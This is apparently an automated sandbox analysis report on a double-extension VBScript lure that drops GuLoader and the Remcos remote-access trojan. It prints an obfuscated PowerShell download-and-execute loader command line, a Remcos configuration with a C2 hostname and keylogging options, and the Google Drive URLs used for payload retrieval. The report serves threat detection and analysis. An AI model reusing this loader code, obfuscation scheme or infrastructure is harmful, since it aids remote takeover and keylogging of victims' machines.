Windows Analysis Report
NTS_eTaxInvoice.html.vbs

Overview

General Information

Sample name:	NTS_eTaxInvoice.html.vbs
Analysis ID:	1522515
MD5:	a1aeb49d80b16158b4b88efef30be753
SHA1:	a7829f01f6a679b9016c1b192431a317827045b1
SHA256:	adae16c4fe643a3093a6e2ac5329616ccc62d71725f208203869d90f08b3c6d1
Tags:	vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

VBScript performs obfuscated calls to suspicious functions

Yara detected GuLoader

Yara detected Powershell download and execute

Yara detected Remcos RAT

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found suspicious powershell code related to unpacking or dynamic code loading

Sample has a suspicious name (potential lure to open the executable)

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Uses an obfuscated file name to hide its real file extension (double extension)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Msiexec Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Found malware configuration

Source: 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara detected Remcos RAT

Source: Yara match	File source: 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 1632, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Source: unknown	HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49734 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32}\InprocServer32 source: powershell.exe, 00000004.00000002.2767069878.0000000006C33000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.2767069878.0000000006C33000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdb source: powershell.exe, 00000004.00000002.2777282940.0000000007DC0000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: a458386d9.duckdns.org

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49733 -> 172.217.16.206:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: powershell.exe, 00000002.00000002.2381359043.000001D36D530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2343774310.000001D301DBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2343774310.000001D300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2737460035.0000000004161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2343774310.000001D300001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2737460035.0000000004161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBcq
Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2343774310.000001D301D7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.2343774310.000001D301642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2758015392.0000000021600000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y
Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y3
Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y3$
Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Yv
Source: powershell.exe, 00000002.00000002.2343774310.000001D300228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1P
Source: powershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1XR8l
Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googhp
Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: msiexec.exe, 00000008.00000003.2698660494.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2662532062.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2738469481.00000000064B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y&export=download
Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1&export=download
Source: powershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2343774310.000001D301459000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49734 version: TLS 1.2

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 1632, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_1812.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1788, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Sample has a suspicious name (potential lure to open the executable)

Source: NTS_eTaxInvoice.html.vbs

Static file information: Suspicious name

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF84860B276	2_2_00007FF84860B276
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF84860C022	2_2_00007FF84860C022
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF8486DA09A	2_2_00007FF8486DA09A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_029FF320	4_2_029FF320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_029FFBF0	4_2_029FFBF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_029FEFD8	4_2_029FEFD8

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7485
